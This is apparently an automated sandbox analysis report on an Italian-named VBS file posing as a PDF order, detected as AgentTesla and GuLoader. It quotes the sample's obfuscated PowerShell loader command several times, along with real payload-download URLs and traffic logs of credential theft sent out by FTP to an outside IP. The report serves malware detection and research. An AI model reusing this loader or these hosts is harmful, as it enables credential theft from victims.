Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name: Ordine n.47201 pdf.vbs
Analysis ID: 755275
MD5: c8290bc8659c4a6a45ccd1af9268e400
SHA1: d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256: f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags: agentteslavbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: ftp.mcmprint.net Virustotal: Detection: 9% Perma Link
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49725 -> 185.31.121.136:21
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49726 -> 185.31.121.136:61313
May check the online IP address of the machine
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe DNS query: name: api.ipify.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.20.78.240 52.20.78.240
Source: Joe Sandbox View IP Address: 52.20.78.240 52.20.78.240
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49726 -> 185.31.121.136:61313
Uses FTP
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.2.7:49725 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown DNS traffic detected: queries for: qwedft.gq
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D2AA09A recv, 17_2_1D2AA09A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
Source: unknown HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Skakspillene.ShellExecute Squawky, " " & chrw(34) & B6 & chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5068
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5068 Jump to behavior
Yara signature match
Source: Ordine n.47201 pdf.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_5812.amsi.csv, type: OTHER Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4C8B70 17_2_1D4C8B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4C87F8 17_2_1D4C87F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4CE844 17_2_1D4CE844
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4C0870 17_2_1D4C0870
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4C6BE0 17_2_1D4C6BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D4C6420 17_2_1D4C6420
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200F9020 17_2_200F9020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200F7888 17_2_200F7888
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200FC178 17_2_200FC178
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200FDF10 17_2_200FDF10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200F4B28 17_2_200F4B28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200FD231 17_2_200FD231
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20103418 17_2_20103418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20101834 17_2_20101834
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20102FD8 17_2_20102FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20100070 17_2_20100070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20100015 17_2_20100015
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D2AB206 NtQuerySystemInformation, 17_2_1D2AB206
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D2AB1D5 NtQuerySystemInformation, 17_2_1D2AB1D5
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Java / VBScript file with very long strings (likely obfuscated code)
Source: Ordine n.47201 pdf.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo 